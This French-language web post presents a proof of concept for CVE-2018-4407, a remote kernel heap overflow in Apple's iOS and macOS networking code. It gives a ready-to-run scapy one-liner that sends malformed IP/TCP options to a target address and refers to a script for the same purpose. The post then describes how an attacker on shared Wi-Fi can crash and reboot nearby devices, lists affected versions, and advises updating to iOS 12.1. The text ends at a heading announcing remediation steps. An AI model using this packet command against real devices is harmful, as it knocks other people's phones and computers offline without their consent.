
iOS 12 / OS X Débordement de tas du noyau à distance (CVE-2018-4407) POC
*iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC :
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Ou utilisez le script
python check_icmp_dos.py 127.0.0.1
Cette vulnérabilité permet à un attaquant, dès lors qu'il est connecté au même réseau Wi-Fi, d'envoyer des paquets malveillants à d'autres utilisateurs sans méfiance afin de provoquer le plantage et le redémarrage de n'importe quel appareil Mac ou iOS. Étant donné que la vulnérabilité se trouve dans le code réseau central du système, aucun logiciel antivirus ne peut s'en protéger.
Les appareils exécutant les systèmes d'exploitation suivants sont vulnérables :
Apple iOS 11 et versions antérieures : tous les appareils (certains appareils mis à niveau vers iOS 12)
Apple macOS High Sierra (version la plus élevée affectée : 10.13.6) : tous les appareils (corrigé via la mise à jour de sécurité 2018-001)
Apple macOS Sierra (version la plus élevée affectée : 10.12.6) : tous les appareils (corrigé via la mise à jour de sécurité 2018-005)
Apple OS X El Capitan et versions antérieures : tous les appareils
Actuellement, Apple a publié la mise à jour ios12.1 qui corrige cette vulnérabilité. Il est recommandé aux utilisateurs de vérifier rapidement la version de leur système et, s'ils sont concernés, d'appliquer sans délai les correctifs nécessaires. Les mesures de remédiation sont les suivantes :